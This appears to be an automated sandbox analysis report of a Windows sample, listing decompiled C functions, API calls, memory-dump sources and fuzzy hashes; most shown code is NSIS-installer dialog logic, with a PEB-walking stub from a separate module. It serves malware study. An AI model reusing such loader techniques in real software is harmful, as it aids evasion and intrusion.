              • Opcode Fuzzy Hash: 72dc8e9db93c4c674b083c5b9862340eb2a4a3a434f4dc697f40a6002f3ad846
              • Instruction Fuzzy Hash: C9412775A00209AFCF00DFE4C989A9E7BB6FF48304B20457AF915EB2D1DB799981CB54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 39%
              			E00402902(short __ebx, short* __edi) {
              				void* _t21;
              
              				if(FindFirstFileW(E00402D3E(2), _t21 - 0x2dc) != 0xffffffff) {
              					E00406483( *((intOrPtr*)(_t21 - 0xc)), _t8);
              					_push(_t21 - 0x2b0);
              					_push(__edi);
              					E0040653C();
              				} else {
              					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
              					 *__edi = __ebx;
              					 *((intOrPtr*)(_t21 - 4)) = 1;
              				}
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t21 - 4));
              				return 0;
              			}





              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: FileFindFirst
              • String ID:
              • API String ID: 1974802433-0
              • Opcode ID: 3b60821db03e7c89aca0c5b0534f9a5e3572e1c1da5c461867ddc0393e8a1961
              • Instruction ID: e1d09971df8357d0b6d26b0e23bbdd0a86073f761c05595cd8bb911c59de634c
              • Opcode Fuzzy Hash: 3b60821db03e7c89aca0c5b0534f9a5e3572e1c1da5c461867ddc0393e8a1961
              • Instruction Fuzzy Hash: C9F08C71A00104AFC700DFA4ED499AEB378EF10314F70857BE916F21E0D7B89E119B2A
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
              • Instruction ID: 7ff609968e4bb235610e905291245dc1817d9e35ba24376159efee01438a3200
              • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
              • Instruction Fuzzy Hash: 85014C78A10208EFCB40DF98C58099DBBF5EB08320B5085D5E914EB721E330AE509B40
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
              • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
              • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
              • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E10001110() {
              
              				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
              			}



              0x10001123

              Memory Dump Source
              • Source File: 00000001.00000002.666317436.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
              • Associated: 00000001.00000002.666313199.0000000010000000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.666320964.0000000010002000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
              • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
              • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
              • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E00404EFF(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
              				struct HWND__* _v8;
              				struct HWND__* _v12;
              				long _v16;
              				signed int _v20;
              				intOrPtr _v24;
              				signed char* _v28;
              				int _v32;
              				void* _v36;
              				signed int _v44;
              				int _v48;
              				signed int* _v60;
              				signed char* _v64;
              				signed int _v68;
              				long _v72;
              				void* _v76;
              				intOrPtr _v80;
              				intOrPtr _v84;
              				void* _v88;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				struct HWND__* _t191;
              				signed int _t203;
              				void* _t206;
              				long _t212;
              				signed int _t216;
              				signed int _t227;
              				void* _t230;
              				void* _t231;
              				int _t237;
              				long _t242;
              				long _t243;
              				signed int _t244;
              				signed int _t249;
              				signed int _t251;
              				signed char _t252;
              				signed char _t260;
              				void* _t265;
              				void* _t267;
              				signed char* _t285;
              				signed char _t286;
              				long _t291;
              				void* _t298;
              				signed int* _t299;
              				int _t300;
              				long _t301;
              				int _t303;
              				long _t304;
              				int _t305;
              				signed int _t306;
              				signed int _t309;
              				signed int _t316;
              				signed char* _t324;
              				int _t329;
              				void* _t331;
              
              				_v12 = GetDlgItem(_a4, 0x3f9);
              				_t191 = GetDlgItem(_a4, 0x408);
              				_t298 =  *0x42a2a8;
              				_t331 = SendMessageW;
              				_v8 = _t191;
              				_v36 = _t298;
              				_v24 =  *0x42a274 + 0x94;
              				if(_a8 != 0x110) {
              					L23:
              					if(_a8 != 0x405) {
              						_t307 = _a16;
              					} else {
              						_a12 = 0;
              						_t307 = 1;
              						_a8 = 0x40f;
              						_a16 = 1;
              					}
              					if(_a8 == 0x4e || _a8 == 0x413) {
              						_v16 = _t307;
              						if(_a8 == 0x413 ||  *((intOrPtr*)(_t307 + 4)) == 0x408) {
              							if(( *0x42a27d & 0x00000002) != 0) {
              								L41:
              								if(_v16 != 0) {
              									_t242 = _v16;
              									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe3d) {
              										SendMessageW(_v8, 0x419, 0,  *(_t242 + 0x5c));
              									}
              									_t243 = _v16;
              									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe39) {
              										_t244 =  *(_t243 + 0x5c);
              										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
              											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) & 0xffffffdf;
              										} else {
              											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) | 0x00000020;
              										}
              									}
              								}
              								goto L48;
              							}
              							if(_a8 == 0x413) {
              								L33:
              								_t307 = 0 | _a8 != 0x00000413;
              								_t249 = E00404E4D(_v8, _a8 != 0x413);
              								_v20 = _t249;
              								if(_t249 >= 0) {
              									_t100 = _t298 + 8; // 0x8
              									_t307 = _t249 * 0x818 + _t100;
              									_t251 =  *_t307;
              									if((_t251 & 0x00000010) == 0) {
              										if((_t251 & 0x00000040) == 0) {
              											_t252 = _t251 ^ 0x00000001;
              										} else {
              											_t260 = _t251 ^ 0x00000080;
              											if(_t260 >= 0) {
              												_t252 = _t260 & 0x000000fe;
              											} else {
              												_t252 = _t260 | 0x00000001;
              											}
              										}
              										 *_t307 = _t252;
              										E0040117D(_v20);
              										_a8 = 0x40f;
              										_a12 = _v20 + 1;
              										_a16 =  !( *0x42a27c) >> 0x00000008 & 0x00000001;
              									}
              								}
              								goto L41;
              							}
              							_t307 = _a16;
              							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
              								goto L41;
              							}
              							goto L33;
              						} else {
              							goto L48;
              						}
              					} else {
              						L48:
              						if(_a8 != 0x111) {
              							L56:
              							if(_a8 == 0x200) {
              								SendMessageW(_v8, 0x200, 0, 0);
              							}
              							if(_a8 == 0x40b) {
              								_t230 =  *0x42372c;
              								if(_t230 != 0) {
              									ImageList_Destroy(_t230);
              								}
              								_t231 =  *0x423740;
              								if(_t231 != 0) {
              									GlobalFree(_t231);
              								}
              								 *0x42372c = 0;
              								 *0x423740 = 0;
              								 *0x42a2e0 = 0;
              							}
              							if(_a8 != 0x40f) {
              								L90:
              								if(_a8 == 0x420 && ( *0x42a27d & 0x00000001) != 0) {
              									_t329 = (0 | _a16 == 0x00000020) << 3;
              									ShowWindow(_v8, _t329);
              									ShowWindow(GetDlgItem(_a4, 0x3fe), _t329);
              								}
              								goto L93;
              							} else {
              								E004011EF(_t307, 0, 0);
              								_t203 = _a12;
              								if(_t203 != 0) {
              									if(_t203 != 0xffffffff) {
              										_t203 = _t203 - 1;
              									}
              									_push(_t203);
              									_push(8);
              									E00404ECD();
              								}
              								if(_a16 == 0) {
              									L75:
              									E004011EF(_t307, 0, 0);
              									_v36 =  *0x423740;
              									_t206 =  *0x42a2a8;
              									_v64 = 0xf030;
              									_v20 = 0;
              									if( *0x42a2ac <= 0) {
              										L86:
              										if( *0x42a26c == 4) {
              											InvalidateRect(_v8, 0, 1);
              										}
              										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
              											E00404E08(0x3ff, 0xfffffffb, E00404E20(5));
              										}
              										goto L90;
              									}
              									_t299 = _t206 + 8;
              									do {
              										_t212 =  *((intOrPtr*)(_v36 + _v20 * 4));
              										if(_t212 != 0) {
              											_t309 =  *_t299;
              											_v72 = _t212;
              											_v76 = 8;
              											if((_t309 & 0x00000001) != 0) {
              												_v76 = 9;
              												_v60 =  &(_t299[4]);
              												_t299[0] = _t299[0] & 0x000000fe;
              											}
              											if((_t309 & 0x00000040) == 0) {
              												_t216 = (_t309 & 0x00000001) + 1;
              												if((_t309 & 0x00000010) != 0) {
              													_t216 = _t216 + 3;
              												}
              											} else {
              												_t216 = 3;
              											}
              											_v68 = (_t216 << 0x0000000b | _t309 & 0x00000008) + (_t216 << 0x0000000b | _t309 & 0x00000008) | _t309 & 0x00000020;
              											SendMessageW(_v8, 0x1102, (_t309 >> 0x00000005 & 0x00000001) + 1, _v72);
              											SendMessageW(_v8, 0x113f, 0,  &_v76);
              										}
              										_v20 = _v20 + 1;
              										_t299 =  &(_t299[0x206]);
              									} while (_v20 <  *0x42a2ac);
              									goto L86;
              								} else {
              									_t300 = E004012E2( *0x423740);
              									E00401299(_t300);
              									_t227 = 0;
              									_t307 = 0;
              									if(_t300 <= 0) {
              										L74:
              										SendMessageW(_v12, 0x14e, _t307, 0);
              										_a16 = _t300;
              										_a8 = 0x420;
              										goto L75;
              									} else {
              										goto L71;
              									}
              									do {
              										L71:
              										if( *((intOrPtr*)(_v24 + _t227 * 4)) != 0) {
              											_t307 = _t307 + 1;
              										}
              										_t227 = _t227 + 1;
              									} while (_t227 < _t300);
              									goto L74;
              								}
              							}
              						}
              						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
              							goto L93;
              						} else {
              							_t237 = SendMessageW(_v12, 0x147, 0, 0);
              							if(_t237 == 0xffffffff) {
              								goto L93;
              							}
              							_t301 = SendMessageW(_v12, 0x150, _t237, 0);
              							if(_t301 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t301 * 4)) == 0) {
              								_t301 = 0x20;
              							}
              							E00401299(_t301);
              							SendMessageW(_a4, 0x420, 0, _t301);
              							_a12 = _a12 | 0xffffffff;
              							_a16 = 0;
              							_a8 = 0x40f;
              							goto L56;
              						}
              					}
              				} else {
              					 *0x42a2e0 = _a4;
              					_t303 = 2;
              					_v32 = 0;
              					_v20 = _t303;
              					 *0x423740 = GlobalAlloc(0x40,  *0x42a2ac << 2);
              					_t265 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
              					 *0x423734 =  *0x423734 | 0xffffffff;
              					_v16 = _t265;
              					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E00405518);
              					_t267 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
              					 *0x42372c = _t267;
              					ImageList_AddMasked(_t267, _v16, 0xff00ff);
              					SendMessageW(_v8, 0x1109, _t303,  *0x42372c);
              					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
              						SendMessageW(_v8, 0x111b, 0x10, 0);
              					}
              					DeleteObject(_v16);
              					_t304 = 0;
              					do {
              						_t273 =  *((intOrPtr*)(_v24 + _t304 * 4));
              						if( *((intOrPtr*)(_v24 + _t304 * 4)) != 0) {
              							if(_t304 != 0x20) {
              								_v20 = 0;
              							}
              							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406579(_t304, 0, _t331, 0, _t273)), _t304);
              						}
              						_t304 = _t304 + 1;
              					} while (_t304 < 0x21);
              					_t305 = _a16;
              					_push( *((intOrPtr*)(_t305 + 0x30 + _v20 * 4)));
              					_push(0x15);
              					E00404492(_a4);
              					_push( *((intOrPtr*)(_t305 + 0x34 + _v20 * 4)));
              					_push(0x16);
              					E00404492(_a4);
              					_t306 = 0;
              					_v16 = 0;
              					if( *0x42a2ac <= 0) {
              						L19:
              						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
              						goto L20;
              					} else {
              						_t324 = _v36 + 8;
              						_v28 = _t324;
              						do {
              							_t285 =  &(_t324[0x10]);
              							if( *_t285 != 0) {
              								_v64 = _t285;
              								_t286 =  *_t324;
              								_v88 = _v16;
              								_t316 = 0x20;
              								_v84 = 0xffff0002;
              								_v80 = 0xd;
              								_v68 = _t316;
              								_v44 = _t306;
              								_v72 = _t286 & _t316;
              								if((_t286 & 0x00000002) == 0) {
              									if((_t286 & 0x00000004) == 0) {
              										 *( *0x423740 + _t306 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
              									} else {
              										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
              									}
              								} else {
              									_v80 = 0x4d;
              									_v48 = 1;
              									_t291 = SendMessageW(_v8, 0x1132, 0,  &_v88);
              									_v32 = 1;
              									 *( *0x423740 + _t306 * 4) = _t291;
              									_v16 =  *( *0x423740 + _t306 * 4);
              								}
              							}
              							_t306 = _t306 + 1;
              							_t324 =  &(_v28[0x818]);
              							_v28 = _t324;
              						} while (_t306 <  *0x42a2ac);
              						if(_v32 != 0) {
              							L20:
              							if(_v20 != 0) {
              								E004044C7(_v8);
              								_t298 = _v36;
              								goto L23;
              							} else {
              								ShowWindow(_v12, 5);
              								E004044C7(_v12);
              								L93:
              								return E004044F9(_a8, _a12, _a16);
              							}
              						}
              						goto L19;
              					}
              				}
              			}


              APIs
              • GetDlgItem.USER32 ref: 00404F16
              • GetDlgItem.USER32 ref: 00404F23
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
              • LoadImageW.USER32 ref: 00404F86
              • SetWindowLongW.USER32 ref: 00404FA0
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
              • DeleteObject.GDI32(00000110), ref: 00405000
              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
              • GetWindowLongW.USER32(?,000000F0), ref: 00405144
              • SetWindowLongW.USER32 ref: 00405152
              • ShowWindow.USER32(?,00000005), ref: 00405162
              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
              • ImageList_Destroy.COMCTL32(?), ref: 00405336
              • GlobalFree.KERNEL32 ref: 00405346
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
              • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
              • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
              • ShowWindow.USER32(?,00000000), ref: 004054EF
              • GetDlgItem.USER32 ref: 004054FA
              • ShowWindow.USER32(00000000), ref: 00405501
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N
              • API String ID: 2564846305-813528018
              • Opcode ID: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
              • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
              • Opcode Fuzzy Hash: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
              • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E00403FB9(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
              				struct HWND__* _v32;
              				void* _v80;
              				void* _v84;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t37;
              				signed int _t39;
              				signed int _t41;
              				struct HWND__* _t51;
              				signed int _t70;
              				struct HWND__* _t76;
              				signed int _t89;
              				struct HWND__* _t94;
              				signed int _t102;
              				int _t106;
              				signed int _t118;
              				signed int _t119;
              				int _t120;
              				signed int _t125;
              				struct HWND__* _t128;
              				struct HWND__* _t129;
              				int _t130;
              				long _t133;
              				int _t135;
              				int _t136;
              				void* _t137;
              
              				_t118 = _a8;
              				if(_t118 == 0x110 || _t118 == 0x408) {
              					_t37 = _a12;
              					_t128 = _a4;
              					__eflags = _t118 - 0x110;
              					 *0x423730 = _t37;
              					if(_t118 == 0x110) {
              						 *0x42a268 = _t128;
              						 *0x423744 = GetDlgItem(_t128, 1);
              						_t94 = GetDlgItem(_t128, 2);
              						_push(0xffffffff);
              						_push(0x1c);
              						 *0x421710 = _t94;
              						E00404492(_t128);
              						SetClassLongW(_t128, 0xfffffff2,  *0x429248);
              						 *0x42922c = E0040140B(4);
              						_t37 = 1;
              						__eflags = 1;
              						 *0x423730 = 1;
              					}
              					_t125 =  *0x40a39c; // 0xffffffff
              					_t136 = 0;
              					_t133 = (_t125 << 6) +  *0x42a2a0;
              					__eflags = _t125;
              					if(_t125 < 0) {
              						L34:
              						E004044DE(0x40b);
              						while(1) {
              							_t39 =  *0x423730;
              							 *0x40a39c =  *0x40a39c + _t39;
              							_t133 = _t133 + (_t39 << 6);
              							_t41 =  *0x40a39c; // 0xffffffff
              							__eflags = _t41 -  *0x42a2a4;
              							if(_t41 ==  *0x42a2a4) {
              								E0040140B(1);
              							}
              							__eflags =  *0x42922c - _t136;
              							if( *0x42922c != _t136) {
              								break;
              							}
              							__eflags =  *0x40a39c -  *0x42a2a4; // 0xffffffff
              							if(__eflags >= 0) {
              								break;
              							}
              							_t119 =  *(_t133 + 0x14);
              							E00406579(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
              							_push( *((intOrPtr*)(_t133 + 0x20)));
              							_push(0xfffffc19);
              							E00404492(_t128);
              							_push( *((intOrPtr*)(_t133 + 0x1c)));
              							_push(0xfffffc1b);
              							E00404492(_t128);
              							_push( *((intOrPtr*)(_t133 + 0x28)));
              							_push(0xfffffc1a);
              							E00404492(_t128);
              							_t51 = GetDlgItem(_t128, 3);
              							__eflags =  *0x42a30c - _t136;
              							_v32 = _t51;
              							if( *0x42a30c != _t136) {
              								_t119 = _t119 & 0x0000fefd | 0x00000004;
              								__eflags = _t119;
              							}
              							ShowWindow(_t51, _t119 & 0x00000008);
              							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100);
              							E004044B4(_t119 & 0x00000002);
              							_t120 = _t119 & 0x00000004;
              							EnableWindow( *0x421710, _t120);
              							__eflags = _t120 - _t136;
              							if(_t120 == _t136) {
              								_push(1);
              							} else {
              								_push(_t136);
              							}
              							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
              							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
              							__eflags =  *0x42a30c - _t136;
              							if( *0x42a30c == _t136) {
              								_push( *0x423744);
              							} else {
              								SendMessageW(_t128, 0x401, 2, _t136);
              								_push( *0x421710);
              							}
              							E004044C7();
              							E0040653C(0x423748, E00403F9A());
              							E00406579(0x423748, _t128, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
              							SetWindowTextW(_t128, 0x423748);
              							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
              							__eflags = _t70;
              							if(_t70 != 0) {
              								continue;
              							} else {
              								__eflags =  *_t133 - _t136;
              								if( *_t133 == _t136) {
              									continue;
              								}
              								__eflags =  *(_t133 + 4) - 5;
              								if( *(_t133 + 4) != 5) {
              									DestroyWindow( *0x429238);
              									 *0x422720 = _t133;
              									__eflags =  *_t133 - _t136;
              									if( *_t133 <= _t136) {
              										goto L58;
              									}
              									_t76 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
              									__eflags = _t76 - _t136;
              									 *0x429238 = _t76;
              									if(_t76 == _t136) {
              										goto L58;
              									}
              									_push( *((intOrPtr*)(_t133 + 0x2c)));
              									_push(6);
              									E00404492(_t76);
              									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
              									ScreenToClient(_t128, _t137 + 0x10);
              									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
              									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
              									__eflags =  *0x42922c - _t136;
              									if( *0x42922c != _t136) {
              										goto L61;
              									}
              									ShowWindow( *0x429238, 8);
              									E004044DE(0x405);
              									goto L58;
              								}
              								__eflags =  *0x42a30c - _t136;
              								if( *0x42a30c != _t136) {
              									goto L61;
              								}
              								__eflags =  *0x42a300 - _t136;
              								if( *0x42a300 != _t136) {
              									continue;
              								}
              								goto L61;
              							}
              						}
              						DestroyWindow( *0x429238);
              						 *0x42a268 = _t136;
              						EndDialog(_t128,  *0x421f18);
              						goto L58;
              					} else {
              						__eflags = _t37 - 1;
              						if(_t37 != 1) {
              							L33:
              							__eflags =  *_t133 - _t136;
              							if( *_t133 == _t136) {
              								goto L61;
              							}
              							goto L34;
              						}
              						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
              						__eflags = _t89;
              						if(_t89 == 0) {
              							goto L33;
              						}
              						SendMessageW( *0x429238, 0x40f, 0, 1);
              						__eflags =  *0x42922c;
              						return 0 |  *0x42922c == 0x00000000;
              					}
              				} else {
              					_t128 = _a4;
              					_t136 = 0;
              					if(_t118 == 0x47) {
              						SetWindowPos( *0x423728, _t128, 0, 0, 0, 0, 0x13);
              					}
              					if(_t118 == 5) {
              						asm("sbb eax, eax");
              						ShowWindow( *0x423728,  ~(_a12 - 1) & _t118);
              					}
              					if(_t118 != 0x40d) {
              						__eflags = _t118 - 0x11;
              						if(_t118 != 0x11) {
              							__eflags = _t118 - 0x111;
              							if(_t118 != 0x111) {
              								L26:
              								return E004044F9(_t118, _a12, _a16);
              							}
              							_t135 = _a12 & 0x0000ffff;
              							_t129 = GetDlgItem(_t128, _t135);
              							__eflags = _t129 - _t136;
              							if(_t129 == _t136) {
              								L13:
              								__eflags = _t135 - 1;
              								if(_t135 != 1) {
              									__eflags = _t135 - 3;
              									if(_t135 != 3) {
              										_t130 = 2;
              										__eflags = _t135 - _t130;
              										if(_t135 != _t130) {
              											L25:
              											SendMessageW( *0x429238, 0x111, _a12, _a16);
              											goto L26;
              										}
              										__eflags =  *0x42a30c - _t136;
              										if( *0x42a30c == _t136) {
              											_t102 = E0040140B(3);
              											__eflags = _t102;
              											if(_t102 != 0) {
              												goto L26;
              											}
              											 *0x421f18 = 1;
              											L21:
              											_push(0x78);
              											L22:
              											E0040446B();
              											goto L26;
              										}
              										E0040140B(_t130);
              										 *0x421f18 = _t130;
              										goto L21;
              									}
              									__eflags =  *0x40a39c - _t136; // 0xffffffff
              									if(__eflags <= 0) {
              										goto L25;
              									}
              									_push(0xffffffff);
              									goto L22;
              								}
              								_push(_t135);
              								goto L22;
              							}
              							SendMessageW(_t129, 0xf3, _t136, _t136);
              							_t106 = IsWindowEnabled(_t129);
              							__eflags = _t106;
              							if(_t106 == 0) {
              								goto L61;
              							}
              							goto L13;
              						}
              						SetWindowLongW(_t128, _t136, _t136);
              						return 1;
              					} else {
              						DestroyWindow( *0x429238);
              						 *0x429238 = _a12;
              						L58:
              						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
              							ShowWindow(_t128, 0xa);
              							 *0x425748 = 1;
              						}
              						L61:
              						return 0;
              					}
              				}
              			}


              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
              • ShowWindow.USER32(?), ref: 00404012
              • DestroyWindow.USER32 ref: 00404026
              • SetWindowLongW.USER32 ref: 00404042
              • GetDlgItem.USER32 ref: 00404063
              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
              • IsWindowEnabled.USER32(00000000), ref: 0040407E
              • GetDlgItem.USER32 ref: 0040412C
              • GetDlgItem.USER32 ref: 00404136
              • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
              • GetDlgItem.USER32 ref: 00404247
              • ShowWindow.USER32(00000000,?), ref: 00404268
              • EnableWindow.USER32(?,?), ref: 0040427A
              • EnableWindow.USER32(?,?), ref: 00404295
              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
              • EnableMenuItem.USER32 ref: 004042B2
              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
              • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
              • SetWindowTextW.USER32(?,00423748), ref: 0040431B
              • ShowWindow.USER32(?,0000000A), ref: 0040444F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
              • String ID: H7B
              • API String ID: 184305955-2300413410
              • Opcode ID: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
              • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
              • Opcode Fuzzy Hash: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
